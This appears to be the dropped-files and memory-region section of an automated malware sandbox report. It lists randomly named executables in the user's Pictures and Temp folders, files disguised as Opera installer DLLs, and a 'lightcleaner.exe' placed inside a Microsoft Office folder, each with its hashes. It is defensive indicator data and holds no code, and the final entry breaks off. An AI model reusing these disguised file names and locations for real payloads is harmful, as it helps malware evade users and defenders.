memory/4516-7-0x0000000005290000-0x00000000052D4000-memory.dmp

memory/4516-8-0x00000000052D0000-0x00000000052EA000-memory.dmp

memory/1640-9-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1640-11-0x00000000750D0000-0x0000000075880000-memory.dmp

memory/1640-12-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/4516-13-0x00000000750D0000-0x0000000075880000-memory.dmp

C:\Users\Admin\Pictures\viwAyBM9ypKyIn34z59F3wXG.exe

MD5 dde72ae232dc63298465861482d7bb93
SHA1 557c5dbebc35bc82280e2a744a03ce5e78b3e6fb
SHA256 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
SHA512 389eb8f7b18fcdd1a6f275ff8acad211a10445ff412221796cd645c9a6458719cced553561e2b4d438783459d02e494d5140c0d85f2b3df617b7b2e031d234b2

C:\Users\Admin\Pictures\qeyjAHbYuSzBauOvY1tE1grX.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe

MD5 2565bdf6fc65a0c1568391c5b354e4a2
SHA1 b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502
SHA256 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697
SHA512 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449

C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe

MD5 ea6ab6fe8ecdb80d9bfff2e4955850a0
SHA1 7d290d99217454b9b4c5133349ce165c56bc763e
SHA256 0e3d94e1f3a765bf1c7fbb407619cc07b3b24741b0f7f87283aff58483b82072
SHA512 3a531e97ebda276f9284bdb352fdbbb04bddb7915bccd815437d959f4a8405f9770c6f46dcd0070a1991e88b654665bc87c748c173765b30d3b7329af86999bf

C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe

MD5 2565bdf6fc65a0c1568391c5b354e4a2
SHA1 b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502
SHA256 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697
SHA512 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449

C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe

MD5 2565bdf6fc65a0c1568391c5b354e4a2
SHA1 b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502
SHA256 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697
SHA512 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449

C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe

MD5 ea6ab6fe8ecdb80d9bfff2e4955850a0
SHA1 7d290d99217454b9b4c5133349ce165c56bc763e
SHA256 0e3d94e1f3a765bf1c7fbb407619cc07b3b24741b0f7f87283aff58483b82072
SHA512 3a531e97ebda276f9284bdb352fdbbb04bddb7915bccd815437d959f4a8405f9770c6f46dcd0070a1991e88b654665bc87c748c173765b30d3b7329af86999bf

C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe

MD5 ea6ab6fe8ecdb80d9bfff2e4955850a0
SHA1 7d290d99217454b9b4c5133349ce165c56bc763e
SHA256 0e3d94e1f3a765bf1c7fbb407619cc07b3b24741b0f7f87283aff58483b82072
SHA512 3a531e97ebda276f9284bdb352fdbbb04bddb7915bccd815437d959f4a8405f9770c6f46dcd0070a1991e88b654665bc87c748c173765b30d3b7329af86999bf

C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/2396-100-0x0000000000300000-0x000000000061C000-memory.dmp

C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/540-132-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

memory/3032-149-0x00007FF60D7C0000-0x00007FF60D8AC000-memory.dmp

C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

memory/4332-154-0x0000000000320000-0x000000000086D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310042200417284332.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/2396-157-0x0000000005050000-0x00000000050B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

memory/2396-153-0x0000000005180000-0x0000000005342000-memory.dmp

memory/2396-160-0x0000000004E80000-0x0000000004E90000-memory.dmp

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310042200430574200.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/4200-166-0x0000000000320000-0x000000000086D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

memory/2396-99-0x00000000750D0000-0x0000000075880000-memory.dmp

C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

C:\Users\Admin\AppData\Local\Temp\Opera_installer_231004220045510568.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Local\Temp\Opera_installer_231004220045510568.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

memory/568-192-0x0000000000750000-0x0000000000C9D000-memory.dmp

memory/1640-193-0x00000000750D0000-0x0000000075880000-memory.dmp

memory/2772-194-0x00000000007C0000-0x00000000007C1000-memory.dmp

memory/1640-195-0x00000000050A0000-0x00000000050B0000-memory.dmp

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310042200476662204.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 60fe01df86be2e5331b0cdbe86165686
SHA1 2a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256 c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512 ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 194455d6a083a49127653d277622d086
SHA1 4eb3a18929ca48c39439d4ab69b8b6a732244f9b
SHA256 98e0b866ae0549464cc8bd33d4054f2f996cf72dde6d138135bf4d2002ab41b0
SHA512 0b85d81d174f0d4d8bbb7c2c913a0042597225ce3eec816bc6c85f5eae68fab25b7ef81f8756ed3e8070528786a059ab38d77e54eb99240f5c56d7db8f97a61e

memory/2396-220-0x00000000750D0000-0x0000000075880000-memory.dmp

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

memory/2204-227-0x0000000000320000-0x000000000086D000-memory.dmp

memory/2036-230-0x0000000000320000-0x000000000086D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310042200482442036.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/1236-234-0x00007FF6E5360000-0x00007FF6E58A3000-memory.dmp

memory/540-235-0x0000000000400000-0x000000000046A000-memory.dmp

memory/3032-238-0x0000000003700000-0x0000000003831000-memory.dmp

memory/4332-239-0x0000000000320000-0x000000000086D000-memory.dmp

memory/3032-237-0x0000000003580000-0x00000000036F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

memory/2772-245-0x0000000000400000-0x0000000000513000-memory.dmp

memory/4200-248-0x0000000000320000-0x000000000086D000-memory.dmp

memory/3396-247-0x00000221C1CB0000-0x00000221C1D34000-memory.dmp

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 f749f169456bf05f8a0c6b25c6e5160e
SHA1 c84a50b43a018ec3eaaa1c1f9722d510d8a9672a
SHA256 92f97b77b52b79b25d3a7b04aff3c1a09e74524a63b7872c69a18fabcb9767c3
SHA512 34c87436d4c0855beca5c659b87c24c45347f3a22e8e98cf823f45ab6370d26369041b9b8bae991862a1b176703c7d03ba8b43e0853c6c09cdb9e8b404c2f639

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 f749f169456bf05f8a0c6b25c6e5160e
SHA1 c84a50b43a018ec3eaaa1c1f9722d510d8a9672a
SHA256 92f97b77b52b79b25d3a7b04aff3c1a09e74524a63b7872c69a18fabcb9767c3
SHA512 34c87436d4c0855beca5c659b87c24c45347f3a22e8e98cf823f45ab6370d26369041b9b8bae991862a1b176703c7d03ba8b43e0853c6c09cdb9e8b404c2f639

memory/3396-256-0x00000221C3890000-0x00000221C38F2000-memory.dmp

memory/2396-261-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/3396-260-0x00000221DC1A0000-0x00000221DC1FE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

MD5 6e3efda28f9423dc58e7273a7462f593
SHA1 ca4bccdc7e1e1d53461f3c8edd2e35590fd24222
SHA256 18bcfc151e790026f17189a06e8b02bdcb086164f8e88c785e7b11405cc566fb
SHA512 d9720d6cf5338223baa5705eb9a43e8b34898b64d5c30743b48cce92692cc62984e9222fc172fe455fe1ea22b82e9a4cdedb6d6fce2242a57c5849e31f883b15

memory/3396-269-0x00000221DC480000-0x00000221DC490000-memory.dmp

memory/3396-268-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp

memory/1236-274-0x00007FF6E5360000-0x00007FF6E58A3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

MD5 6e3efda28f9423dc58e7273a7462f593
SHA1 ca4bccdc7e1e1d53461f3c8edd2e35590fd24222
SHA256 18bcfc151e790026f17189a06e8b02bdcb086164f8e88c785e7b11405cc566fb
SHA512 d9720d6cf5338223baa5705eb9a43e8b34898b64d5c30743b48cce92692cc62984e9222fc172fe455fe1ea22b82e9a4cdedb6d6fce2242a57c5849e31f883b15

C:\Users\Admin\AppData\Local\Temp\926387074340

MD5 7425846ffb4decd1f4967054515410b4
SHA1 babe08bd4ee569d669fbc6dbe6e17c4d66a1a7b3
SHA256 0bb84e8070d50739964d9c394fff6469c69fa9005b264a20156e58d7ca3b9afa
SHA512 dbf90794775d63a8b0480699736b86b854e95cf62c7500e6f5e1ac7df5699c92f72d3b4be3347be881ea7477330aa82625cdcd0413cb0e1378d79f21fa18c2e0

C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

MD5 6e3efda28f9423dc58e7273a7462f593
SHA1 ca4bccdc7e1e1d53461f3c8edd2e35590fd24222
SHA256 18bcfc151e790026f17189a06e8b02bdcb086164f8e88c785e7b11405cc566fb
SHA512 d9720d6cf5338223baa5705eb9a43e8b34898b64d5c30743b48cce92692cc62984e9222fc172fe455fe1ea22b82e9a4cdedb6d6fce2242a57c5849e31f883b15

memory/2396-286-0x0000000006400000-0x000000000692C000-memory.dmp

memory/3948-288-0x00007FF8AD7B0000-0x00007FF8AE271000-memory.dmp

memory/3948-290-0x0000019A55500000-0x0000019A55510000-memory.dmp

memory/3948-291-0x0000019A55500000-0x0000019A55510000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5x3pdke.ccn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3948-297-0x0000019A6DCC0000-0x0000019A6DCE2000-memory.dmp

memory/2396-302-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/3948-305-0x0000019A55500000-0x0000019A55510000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
